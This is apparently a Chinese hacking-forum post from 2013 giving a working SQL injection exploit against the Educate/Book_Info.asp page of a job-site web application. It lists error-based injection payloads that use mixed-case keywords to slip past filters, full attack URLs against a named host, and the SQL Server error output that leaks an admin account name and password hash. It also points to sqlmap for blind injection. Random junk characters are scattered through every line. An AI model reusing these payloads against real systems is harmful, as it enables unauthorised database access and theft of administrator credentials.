漏洞出现在Educate/Book_Info.asp8 f6 w6 \0 N1 t- A; b/ D: S. C/ f
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
% _# r0 ]; ?) ^/ b% Lexp:如下5 O! o1 ]( F3 |5 |0 N4 b# v
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
1 C4 t, A, ~1 l+ r0 |查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
6 \- |! W I& V- zhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
4 p. z% C5 ]* ]* r/ q4 n9 d- vMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
/ E2 f9 g0 y2 ?8 m j, F将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。& V) @. U% |; Z# a9 V# D
/Educate/Book_Info.asp,行 80 U" ~1 N$ _) {. c9 M$ y
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)( B6 H$ c4 R" U( r4 _: {4 Y9 b
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'4 u, u* J8 b4 u6 C w6 I
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。- s& p. D5 |6 B: ?4 ^# W" C+ A9 I: [
/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
支持
反对